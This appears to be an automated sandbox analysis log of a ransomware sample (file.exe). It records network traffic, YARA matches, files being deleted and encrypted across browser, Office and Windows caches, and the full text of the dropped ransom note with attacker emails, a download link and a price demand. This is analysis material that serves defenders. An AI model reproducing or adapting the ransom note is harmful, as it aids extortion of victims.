          Source: file.exe, 00000007.00000003.2762141531.0000000000902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2764074293.0000000000902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2762877156.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2763042537.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.000000000084E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dPrice of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0874PsawqSr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5Jump to dropped file
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4856, type: MEMORYSTR
          Source: Yara matchFile source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.file.exe.22615a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.file.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.file.exe.23315a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.file.exe.22315a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.file.exe.22615a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1208, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4616, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5088, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2052, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3392, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4856, type: MEMORYSTR
          Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\IPKGELNTQY.xlsxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{ac01b07d-c9ac-4d31-8220-3dc6d7aa0576}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~custJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico entropy: 7.99867754258Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico entropy: 7.99872379748Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico entropy: 7.99851993018Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico entropy: 7.99834363453Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico entropy: 7.99874763314Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico entropy: 7.99839211306Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99849689927Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99574754836Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99799809393Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99874541652Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99847361569Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js entropy: 7.99833985516Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js entropy: 7.99658358488Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\Init[1].htm entropy: 7.99835268108Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99717002002Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99614137543Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99208782689Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99298954288Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99235073154Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99269312056Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99242802017Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db entropy: 7.99811938602Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db entropy: 7.99834022327Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99770667282Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99821441796Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99410053436Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.9969957012Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_061938_46c-3e0.log entropy: 7.99348803273Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99643153472Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99652994728Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409603686917468.txt entropy: 7.99827037929Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409602890767950.txt entropy: 7.99796890278Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409605511411373.txt entropy: 7.99830976753Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409605028834776.txt entropy: 7.9981791557Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604847938702.txt entropy: 7.9980185261Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604779873335.txt entropy: 7.99830195645Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604473729424.txt entropy: 7.99817020806Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604173107312.txt entropy: 7.99798413043Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409603873448744.txt entropy: 7.99826883045Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409603755735310.txt entropy: 7.99841293806Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409607532982526.txt entropy: 7.99815979703Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js entropy: 7.99471974564Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\onra7PQl9o5bYT2lASI1BE4DDEs[1].css entropy: 7.99732169524Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\uANxnX_BheDjd2-cdR8N9DEWlds[1].css entropy: 7.99186402335Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js entropy: 7.99858545101Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js entropy: 7.99841617383Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js entropy: 7.99664210678Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js entropy: 7.99681404598Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99763822392Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.9977943526Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\DQECM999\www.bing[1].xml entropy: 7.99617066919Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99191833191Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99881058398Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99167035642Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm entropy: 7.99468783477Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite entropy: 7.99588569646Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm entropy: 7.9945081567Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite entropy: 7.99688850364Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm entropy: 7.99394616812Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite entropy: 7.99679968173Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm entropy: 7.99402042825Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite entropy: 7.99673745385Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm entropy: 7.99531967397Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite entropy: 7.99598303917Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99759716741Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json entropy: 7.99085436043Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm entropy: 7.99475425293Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409609587090804.txt entropy: 7.99862216027Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409608313396144.txt entropy: 7.99837250571Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json entropy: 7.9915752462Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg entropy: 7.99331783091Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json entropy: 7.99116958991Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133684540818349887.txt entropy: 7.99849396131Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133684540518223208.txt entropy: 7.99849418378Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409618620166650.txt entropy: 7.9983456345Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409618348757513.txt entropy: 7.99851316555Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409618156106430.txt entropy: 7.99873536572Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409611829881178.txt entropy: 7.99868475758Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409611734040046.txt entropy: 7.99832657533Jump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409611536865225.txt entropy: 7.99863851093Jump to dropped file
